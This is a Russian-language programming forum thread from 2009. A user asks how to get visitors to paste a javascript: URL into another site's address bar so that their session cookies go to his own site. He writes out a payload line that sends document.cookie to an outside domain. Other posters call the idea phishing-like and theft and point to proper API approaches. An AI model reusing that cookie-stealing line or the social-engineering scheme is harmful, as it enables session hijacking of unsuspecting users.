![]() |
|
Модераторы: Sardar, Aliance |
![]()
|
|
| Zmiuko |
|
|||
![]() http://zmiuko.ru ![]() ![]() Профиль Группа: Участник Сообщений: 297 Регистрация: 8.10.2008 Репутация: нет Всего: 2 |
Извиняюсь за столь поздний час, за беспокойство.
У меня проблема. Необходимо при помощи скрипта проделать следущее: 1. Скопировать данные в буфер обмена. 2. Открыть указанную интернет-страницу по указанному адресу, например в другой вкладке. 3. И в адресную строку открытой страницы внести из буфера, допустим javascript:текст В результате получаем открытую страницу в новой вкладке где в адресной строке пользователю вставлен код. Ему остается только подтвердить, либо не подтвердить. Я очень хорошо понимаю что это фишинг-подобное, но в гугле таких вопросов не нашел, необходимо не для взлома. Просто для облегчения работы с сервисом. Прошу помочь. Пожалуйста. Заранее благодарен. |
|||
|
||||
| bars80080 |
|
|||
![]() прапор творюет ![]() ![]() ![]() ![]() Награды: 1 Профиль Группа: Завсегдатай Сообщений: 12022 Регистрация: 5.12.2007 Где: Königsberg Репутация: 15 Всего: 315 |
для взлома - не для взлома, сам механизм на редкость тонкий. обломаться может в каждом колене
посоветовал бы всё же найти другой концепт для легальной операции |
|||
|
||||
| Zmiuko |
|
|||
![]() http://zmiuko.ru ![]() ![]() Профиль Группа: Участник Сообщений: 297 Регистрация: 8.10.2008 Репутация: нет Всего: 2 |
Не имею возможности, поскольку использовать буду для авторизации. Сессия пользователя привязана к нескольким уникальным параметрам. Поэтому выход единственный: упростить для него задачу входа с одного ресурса на другой. Другими словами мне необходимо авторизоваться под его куками, дабы подключить функции.
Была идея использовать фрейм на ресурс и посредством обращения к фрейму "граббить" данные cookies, но видители это невозможно :( |
|||
|
||||
| bars80080 |
|
|||
![]() прапор творюет ![]() ![]() ![]() ![]() Награды: 1 Профиль Группа: Завсегдатай Сообщений: 12022 Регистрация: 5.12.2007 Где: Königsberg Репутация: 15 Всего: 315 |
одна база пользователей на несколько разнодоменных сайтов? и надо при переходе, чтобы один раз авторизовавшись, больше не надо было?
и вы решили положиться на столь не надёжную вещь как javascript? да ещё в таком механизме как буфер и вставка чего-то в адресную строку. первое у меня на автомате режется, второе я сам буду сперепугу рубить. когда у меня сайт начинает куда-то упрыгивать, я его вырубаю не правда. возможности всегда есть. к примеру, почему бы не делать следующее, все ссылки ведущие с сайта А на сайт Б не сопровождать идентификатором? а затем на сайте Б создавать запрос из uid, ip, time и обращаться к сайту А, у которого в БД записано, что да, был такой крендель с таким uid, ip и это такой-то пользователь |
|||
|
||||
| Zmiuko |
|
|||
![]() http://zmiuko.ru ![]() ![]() Профиль Группа: Участник Сообщений: 297 Регистрация: 8.10.2008 Репутация: нет Всего: 2 |
Постойте-постойте. Никто не говорил, что второй ресурс мой. К примеру есть некий ресурс VASYA.COM на котором авторизация происходит через куки, где хранится просто сессия с привязкой к ip. Есть также мой сайт VOVA.RU , который в силу определенных причин просто жить не может без VASYA.COM поскольку имеет статус вспомогательного сайта, так скажем ряд функционала, подменяющий, либо увеличивающий возможности первого. Следовательно для того чтобы VOVA.RU заработал как надо, необходимо подключиться через сокеты к VASYA.COM. Но тут задаемся проблемой. VAVA.RU же несет в себе вспомогательные функции к VASYA.COM относительно каждого... КАЖДОГО... зарегистрировавшегося там пользователя. Тут же задаемся проблемой: а как же нам авторизовать каждого пользователя, если граббить для них редактируемый контент не имеет смысл - стоит жесткое ограничение. Тут возникает идея, а почему же не попробовать через клиентскую часть... Идем на Винград, задаем вопрос относительно используемых функций javascript либо каких-либо технологий.
Понимаете в чем смысл? Вы уж извините, просто уже весь "лоб расшиб", а проект сдавать к концу недели. Ту как бы не могу понять каким же методом обойти данное припятствие. Проблема есть, и ее надо решить. Быть может решение данной задачи поможет многим другим в будущем. Что-же касается взломов, то их и без этого топика совершат. |
|||
|
||||
| bars80080 |
|
|||
![]() прапор творюет ![]() ![]() ![]() ![]() Награды: 1 Профиль Группа: Завсегдатай Сообщений: 12022 Регистрация: 5.12.2007 Где: Königsberg Репутация: 15 Всего: 315 |
||||
|
||||
| mxt |
|
|||
|
Шустрый ![]() Профиль Группа: Участник Сообщений: 133 Регистрация: 6.9.2007 Репутация: нет Всего: 1 |
если VOVA.com вспомогательный сайт VASJA.com то последний должен знать об этом, и предоставлять API для этого.
а так тут леваком пахнет так, что глаза режет --------------------
|
|||
|
||||
| Zmiuko |
|
|||
![]() http://zmiuko.ru ![]() ![]() Профиль Группа: Участник Сообщений: 297 Регистрация: 8.10.2008 Репутация: нет Всего: 2 |
Если с помощью сокетов ничего не сделаешь. Не пройдешь авторизацию. |
|||
|
||||
| mxt |
|
|||
|
Шустрый ![]() Профиль Группа: Участник Сообщений: 133 Регистрация: 6.9.2007 Репутация: нет Всего: 1 |
1, при входе пользователя, посылать на базовый сервер запрос, в котором будет текущий UID ссесии пользователя. и его имя 2. при дальнейших запросах присылать этот UID, чтоб по нему базовый сервер отдавал то что нужно; но так как базовый VASJA.COM даже и не знает о существовании VOVA.COM и не ту доступа туда, то не думаю, что хозяева VASJA.COM хотелиб давать свой функционал постороннему сайту. --------------------
|
|||
|
||||
| Zmiuko |
|
|||
![]() http://zmiuko.ru ![]() ![]() Профиль Группа: Участник Сообщений: 297 Регистрация: 8.10.2008 Репутация: нет Всего: 2 |
Эхх.. Да как-то хотели-не хотели ... это второе... Поскольку к примеру при граббинге того же Вконтакте, Яндекс, Гугла... никто не спрашивает - просто делают все через сокеты..
Вчера к примеру на Вконтакте обнаружилась ограничение подключения через сокеты. Делаешь сервис к нему, многопоточный. Что бы к примеру организовать отправку граффити либо еще чего. А тоже самое. Теперь посредством отправки кук ничего не получишь. Тенденция какая-то убирать из кук все кроме сессий и делать привязку к ip. На форумах обнаружил, что подменить строку браузера почтищто нереально. Это необходимо делать легально. Вот и хочу легатьно, копировать в кеш ссылку. Открывать стороннее окно и уже в адресной строке того окна/вкладки помещать из буфера обмена примерно следущее: javascript:open('Vova.ru/index.php?c='+document.cookie,'_self'); далее пользователю останется только выбрать нажать или нет. И пять таже привязка все портит. Скрипт берет куки, формирует запрос, а ip уже не тот. Я уже голову сломал на этом. Не могу додуматься как можно пользователя авторизовать. И фрейм пробовал - но это уже дикие дебри. Это сообщение отредактировал(а) Zmiuko - 26.9.2009, 04:42 |
|||
|
||||
| bars80080 |
|
|||
![]() прапор творюет ![]() ![]() ![]() ![]() Награды: 1 Профиль Группа: Завсегдатай Сообщений: 12022 Регистрация: 5.12.2007 Где: Königsberg Репутация: 15 Всего: 315 |
послушайте, при всём уважении, если авторизация проходит на одном ресурсе, а пользоваться ей мы хотим на другом, то всё равно потребуется внедрить скрипты как во второй ресурс, так и в первый. когда же пытаетесь воспользоваться первым без его уведомления, то как ни крутись - это воровство и нарушение правил, и конечно же оно будет максимально затруднено
принцип общения двух серверов сам по себе не сложный, но для этого нужно чтобы они оба говорили, а не один из них молчал |
|||
|
||||
![]()
|
| Форум для вопросов, которые имеются в справочниках, но их поиск вызвал затруднения, или для разработчика требуется совет или просьба отыскать ошибку. Напоминаем: 1) чётко формулируйте вопрос, 2) приведите пример того, что уже сделано, 3) укажите явно, нужен работающий пример или подсказка о том, где найти информацию. |
| 0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
| 0 Пользователей: | |
| « Предыдущая тема | JavaScript: Общие вопросы | Следующая тема » |
|
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |